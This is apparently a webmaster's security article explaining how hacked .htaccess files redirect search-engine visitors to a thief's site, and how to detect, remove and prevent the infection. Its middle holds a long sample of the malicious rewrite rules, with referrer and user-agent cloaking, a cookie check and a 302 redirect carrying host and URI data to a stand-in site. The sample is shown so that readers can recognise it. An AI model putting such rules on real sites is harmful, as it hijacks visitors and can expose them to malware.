Are They Stealing Your Search Engine Traffic?
Your .htaccess file can be used to redirect traffic from search engines to a thief's website.
If your site has been hacked in this way, then when someone finds you in a search engine and clicks on a link to go to your site, they are taken to the thief's site, instead.
The links in the search result go to your site, just like they're supposed to. But, your site redirects the visitor to the traffic thief's site.
Search engine robots are not redirected. Nor is a list of RSS feed fetchers and other page retrieving software.
If the redirect page is designed to insert a trojan or virus into a computer that can be done only via certain browsers, other browsers might not be redirected at all.
The thief is even more sneaky. When the browser is redirected, a cookie is set so it happens only once for any specific browser. (Once is enough to infect a computer or whatever the traffic thief's purpose is.)
Even when site owners who happen to use a targeted browser are redirected when clicking on a search results link to their own site, they may fail to sustain their alarm. Because when they come back to try to repeat the redirect, their search result links take them to their site just like they are supposed to. They may assume they had inadvertently clicked on the wrong link the first time around.
Thus, testing search result links yourself might not reveal traffic theft. If your browser is on the "do not redirect" list or already has the thief's cookie, it won't be redirected.
The .htaccess file is a feature of the Apache server software. Apache is used to serve web pages on the majority of Unix/Linux and some Microsoft operating system hosting computers.
How To Spot Search Engine Traffic Theft
Thieves steal search traffic by updating .htaccess files and/or creating new ones.
Check your .htaccess files for code that doesn't belong there. Check subdirectories for .htaccess files that shouldn't be there or that contain strange code.
I've seen two infections.
-
In one, the thief updated existing .htaccess files with the redirect code. The site owner saw nothing amiss because the site operated just as before.
-
In the other, the thief replaced existing .htaccess files so they contained only the redirect code. The site owner knew immediately something was wrong because the site didn't work the same way.
Below is a disabled version of search traffic theft code. Enough of the original is intact so you should be able to recognize it if you find it in your .htaccess file. The redirect code may also differ depending on the traffic thief's purpose.
The one sure way to recognize a hacked .htaccess file is if the file contains code that is not supposed to be there.
RewriteEngine On RewriteCond %{REQUEST_METHOD} !^GET$ RewriteCond %{HTTP_REFERER} !^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?)$ [NC] RewriteCond %{HTTP_REFERER} !^(q\=cache\:)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo)$ [NC] RewriteCond %{HTTP_USER_AGENT} !^(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg)$ [NC] RewriteCond %{HTTP_COOKIE} !^xccgtswgokoe$ RewriteCond %{HTTPS} !^off$ RewriteRule ^(.*)$ http://example.com/cgi-bin/r.cgi?p=10003&i=9910ed08&j=321&m=2c45b045a525fde6b3ef6f17e8c878f8&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
Because the redirect code uses the Apache rewrite engine, only the directories with the code in the .htaccess file are affected. Therefore, the thief is likely to put the redirect code into numerous, perhaps all, subdirectories.
Check every subdirectory when looking for infection.
The Files Monitor software can be used to send you an email when files change in specified directories or new files are added. But the software has to be implemented when the server is not infected in order to notify you when infection occurs.
How To Remove Search Engine Traffic Theft Infection
Remove the thief's redirect code from the .htaccess files. Or, if you have updated backup files, upload the backups to overwrite the infected one.
Check all subdirectories. Delete .htaccess files that don't belong there. Remove offending code or replace .htaccess files as necessary.
It is important to check all subdirectories. In one of the infections I've seen, every subdirectory was infected, including image and data directories.
Ways To Prevent Search Engine Traffic Theft
Be close-fisted with your FTP password. If someone needs FTP access, either make a separate temporary FTP account or change the FTP password after the person has completed their project.
Both search engine traffic theft infections I've seen occurred because the FTP credentials were compromised.
Whenever an FTP password is required by someone else, always use a secure form, FAX, or the telephone to provide it. A secure form is on a web page with a https:// URL, not http://. Never use email, it's not secure.
Use FTP only on trusted connections. (Public WiFi is not to be trusted.) Secure FTP (SFTP) is better than regular FTP, as the password and data transfers are encrypted.
If FTP passwords are stored on your computer or on the computer of anyone who has had FTP access to your server, a trojan or a virus infection can send thieves the FTP credentials.
Although not specifically about FTP password compromises the 9 ways your account can be compromised Ask Leo article is a great reminder of how easy it really is to inadvertently provide a password to a thief.
To recap: Provide FTP passwords only if necessary and only in a secure manner. Change FTP passwords or delete the FTP accounts after others have finished using them. Practice password security. Keep your computers infection-free.
What To Do Right Now
To verify your domain is not infected to steal your search engine traffic via .htaccess, check the document root .htaccess file for anything that does not belong there. (The document root is the directory where a domain's main or index file is located.) Then, do the same for each subdirectory.
Will Bontrager